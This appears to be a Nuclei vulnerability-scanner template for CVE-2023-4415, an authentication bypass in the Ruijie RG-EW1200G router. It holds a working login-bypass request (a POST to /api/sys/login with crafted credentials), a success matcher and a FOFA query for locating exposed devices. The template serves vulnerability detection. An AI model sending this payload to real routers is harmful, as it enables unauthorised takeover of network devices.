id: CVE-2023-4415 info: name: Ruijie RG-EW1200G Router Background - Login Bypass author: DhiyaneshDK severity: high description: | A vulnerability was found in Ruijie RG-EW1200G 07161417 r483. It has been rated as critical. Affected by this issue is some unknown functionality of the file /api/sys/login. The manipulation leads to improper authentication. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-237518 is the identifier assigned to this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-4415 - https://github.com/blakespire/repoforcve/tree/main/RG-EW1200G-logic - https://vuldb.com/?ctiid.237518 - https://vuldb.com/?id.237518 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-4415 cwe-id: CWE-287 epss-score: 0.00355 epss-percentile: 0.68908 cpe: cpe:2.3:o:ruijienetworks:rg-ew1200g_firmware:07161417_r483:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ruijienetworks product: rg-ew1200g_firmware fofa-query: body="app.2fe6356cdd1ddd0eb8d6317d1a48d379.css" tags: cve,cve2023,ruijie,router http: - method: POST path: - "{{BaseURL}}/api/sys/login" body: | { "username":"2", "password":"admin", "timestamp":1695218596000 } matchers-condition: and matchers: - type: word part: body words: - '"result":"ok"' - '"msg":"登入成功"' condition: and - type: word part: header words: - application/json - type: status status: - 200 # digest: 4a0a004730450220499fd06b6bbec68c4ea09bdd047348bcad49e5bd1b13aa90100b64264cc3bb52022100de9a81d5f9f5bbf96a6da04b08b760d9900273d80a85f3727c6167ca8bbaeade:922c64590222798bb761d5b6d8e72950